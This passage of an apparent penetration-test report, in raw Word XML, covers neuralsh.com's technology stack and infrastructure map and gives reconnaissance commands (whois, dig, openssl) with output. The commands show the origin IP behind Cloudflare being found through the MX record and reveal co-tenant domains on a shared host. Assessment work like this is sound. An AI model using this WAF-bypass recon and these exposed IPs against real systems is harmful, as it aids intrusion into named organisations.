                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exim 4.99.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail Delivery Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Dovecot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>PowerDNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Registrar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GoDaddy (privacy via Domains By Proxy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cloudflare nameservers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 8: neuralsh.com technology stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.2.2 Infrastructure Map</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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>104.21.91.198</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Main application — Cloudflare CDN edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>mail.neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.62.217</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail + backend server — cPanel shared hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.62.217 (direct)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Admin panels, database, MikroTik — 20+ exposed services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 9: Infrastructure map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The main site resolves to Cloudflare's anycast network. The real origin server IP (103.16.62.217) was discovered via the MX record for mail.neuralsh.com — a discovery that bypassed the entire WAF and directly exposed the backend infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.3 Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance was conducted entirely through passive and semi-passive techniques — no traffic was sent to the production application until the scanning phase. The goal was to map as much of the attack surface as possible using only publicly available information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.1 WHOIS and Domain Registration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>whois neuralsh.com | grep -E "Registrar|Created|Name Server"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The WHOIS lookup revealed GoDaddy as the domain registrar with a privacy service active (Domains By Proxy LLC), masking the registrant's personal details. The domain was registered on July 3, 2025, making it relatively new. DNS management was delegated to Cloudflare nameservers. This initial finding confirmed that the main site IP would be masked behind Cloudflare's infrastructure — making DNS analysis the primary path for discovering the origin server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="3081560"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig45_whois.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="3081560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.5: WHOIS lookup for neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.2 DNS Enumeration and Origin IP Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS enumeration was the most consequential step of the entire engagement. The following sequence of dig commands was used to progressively map the DNS records and ultimately reveal the origin server IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Step 1 — A record: Cloudflare CDN IPs</w:t>
        <w:br/>
        <w:t>dig A neuralsh.com</w:t>
        <w:br/>
        <w:t># 104.21.91.198 (Cloudflare anycast — real server hidden)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 2 — MX record: reveals mail server hostname</w:t>
        <w:br/>
        <w:t>dig MX neuralsh.com</w:t>
        <w:br/>
        <w:t># mail.neuralsh.com (priority 0)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 3 — Resolve mail server: reveals REAL origin IP</w:t>
        <w:br/>
        <w:t>dig A mail.neuralsh.com</w:t>
        <w:br/>
        <w:t># 103.16.62.217 — the backend server that Cloudflare is meant to protect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="5693333"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig46_dig_mx.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="5693333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.6: dig MX and TXT records showing SPF and DMARC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This three-step DNS chain revealed 103.16.62.217 as the origin server behind the Cloudflare WAF. The MX record is a common oversight — organizations often configure the main domain to proxy through Cloudflare but leave the mail server record pointing directly at the origin. This single lookup rendered the Cloudflare WAF irrelevant for the remainder of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Additional DNS records were analyzed for further intelligence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># TXT record — email security posture</w:t>
        <w:br/>
        <w:t>dig TXT neuralsh.com</w:t>
        <w:br/>
        <w:t># v=spf1 +mx +a +ip4:103.16.62.217 ~all   (SPF softfail — N-012)</w:t>
        <w:br/>
        <w:t># v=DMARC1; p=quarantine                   (DMARC not enforcing — N-012)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Wildcard DNS — any subdomain resolves</w:t>
        <w:br/>
        <w:t>dig randomxyz123.neuralsh.com</w:t>
        <w:br/>
        <w:t># Returns: 103.16.62.217   (wildcard DNS active — N-010)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Zone transfer — blocked (positive control)</w:t>
        <w:br/>
        <w:t>dig axfr @ns1.cloudflare.com neuralsh.com</w:t>
        <w:br/>
        <w:t># Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1859568"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig47_wildcard_dns.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1859568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.7: Wildcard DNS — randomxyz123.neuralsh.com resolves to origin IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.3 SSL Certificate Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The SSL certificate on the origin server disclosed infrastructure details that confirmed the server's hosting environment and identified a co-tenant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>openssl s_client -connect 103.16.62.217:443 2&gt;/dev/null | openssl x509 -noout -subject -issuer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="806400"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig48_ssl_cert.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="806400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.8: SSL certificate mismatch — endoncambodia.com and onesala.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The certificate returned was issued to www.endoncambodia.com — not neuralsh.com. The Subject Alternative Names included cpanel.endoncambodia.com, mail.endoncambodia.com, and webmail.endoncambodia.com. Mail service certificates on ports 110, 143, 465, 587, 993, and 995 were issued to *.onesala.com. This combination of evidence confirmed two important facts: the server is a shared cPanel hosting environment hosting multiple clients simultaneously, and at least two other organizations (endoncambodia.com and onesala.com) share the same physical server as neuralsh.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.4 JavaScript Bundle Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
